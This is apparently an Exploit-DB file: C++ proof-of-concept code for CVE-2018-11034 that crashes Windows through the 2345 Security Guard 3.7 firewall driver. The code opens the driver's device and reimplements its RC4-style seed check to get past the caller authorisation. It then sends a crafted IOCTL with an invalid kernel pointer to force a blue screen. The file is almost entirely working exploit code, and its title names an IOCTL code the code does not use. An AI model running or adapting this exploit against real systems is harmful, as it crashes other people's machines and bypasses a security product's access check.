exploit-db-mirror/exploits/windows/dos/44619.cpp

# Exploit Title: [BSOD  by IOCTL 0x8000200D in 2345NsProtect.sys  of 2345 Security Guard 3.7]
# Date: [20180513]
# Exploit Author: [anhkgg]
# Vendor Homepage: [http://safe.2345.cc/]
# Software Link: [http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe]
# Version: [v3.7] (REQUIRED)
# Tested on: [Windows X64]
# CVE : [CVE-2018- 11034]

#include <windows.h>
#include <stdio.h>

struct NETFW_IOCTL_ADD_PID
{
	DWORD pid;
	char seed[0x14];//
};//0x18

struct NETFW_IOCTL_SET_PID
{
	BYTE set_state;//
	BYTE unk;//1
	WORD buf_len;//2
	DWORD pid;//4
	char buf[0x64];//8
};//6c

struct NETFW_IOCTL_222040
{
	DWORD* ptr;
	DWORD size;
};//

int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
{
	int result;

	*a1 ^= *a2;
	*a2 ^= *a1;
	result = (unsigned __int8)*a2;
	*a1 ^= result;
	return result;
}

int __stdcall sub_12A80(char *a1, int len, char *a3)
{
	int result;
	unsigned __int8 v4;
	__int16 i;
	__int16 j;
	unsigned __int8 k;

	for ( i = 0; i < 256; ++i )
		a3[i] = i;
	a3[256] = 0;
	a3[257] = 0;
	k = 0;
	v4 = 0;
	result = 0;
	for ( j = 0; j < 256; ++j )
	{
		v4 += a3[j] + a1[k];
		f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);
		result = (k + 1) / len;
		k = (k + 1) % len;
	}
	return result;
}

char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
{
	char *result;
	__int16 i;
	unsigned __int8 v5;
	unsigned __int8 v6;

	v5 = a3[256];
	v6 = a3[257];
	for ( i = 0; i < len; ++i )
	{
		v6 += a3[++v5];
		f_XOR__12A30((BYTE*)&a3[v5], (BYTE*)&a3[v6]);
		a1[i] ^= a3[(unsigned __int8)(a3[v6] + a3[v5])];
	}
	a3[256] = v5;
	result = a3;
	a3[257] = v6;
	return result;
}

void calc_seed(char* seed, char* dst)
{
	char Source1[26] = {0};
	char a3[300] = {0};

	Source1[0] = 8;
	Source1[1] = 14;
	Source1[2] = 8;
	Source1[3] = 10;
	Source1[4] = 2;
	Source1[5] = 3;
	Source1[6] = 29;
	Source1[7] = 23;
	Source1[8] = 13;
	Source1[9] = 3;
	Source1[10] = 15;
	Source1[11] = 22;
	Source1[12] = 15;
	Source1[13] = 7;
	Source1[14] = 91;
	Source1[15] = 4;
	Source1[16] = 18;
	Source1[17] = 26;
	Source1[18] = 26;
	Source1[19] = 3;
	Source1[20] = 4;
	Source1[21] = 1;
	Source1[22] = 15;
	Source1[23] = 25;
	Source1[24] = 10;
	Source1[25] = 13;

	sub_12A80(seed, 0x14, a3);
	sub_12B60(Source1, 0x1A, a3);
	memcpy(dst, Source1, 26);
}

int poc_2345NetFirewall()
{
	HANDLE h = CreateFileA("\\\\.\\2345NetFirewall",
		GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
		NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if(h == INVALID_HANDLE_VALUE) {
		printf("[-] Open device error: %d\n", GetLastError());
		return 1;
	}
	DWORD BytesReturned = 0;

	DWORD ctlcode = 0x222298;
	NETFW_IOCTL_ADD_PID add_pid = {0};
	add_pid.pid = GetCurrentProcessId();

	if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
		printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
	}

	ctlcode = 0x2222A4;
	NETFW_IOCTL_SET_PID set_pid = {0};
	set_pid.pid = GetCurrentProcessId();
	set_pid.set_state = 1;

	calc_seed(add_pid.seed, set_pid.buf);
	set_pid.buf_len = 26;

	if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
		printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
	}

	//BSOD
	ctlcode = 0x222040;
	NETFW_IOCTL_222040 buf_222040 = {0};
	buf_222040.size = 1;
	buf_222040.ptr = (DWORD*)0x80000000;
	if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) {
		printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
	}

	return 0;
}

int main()
{
	poc_2345NetFirewall();

	return 0;
}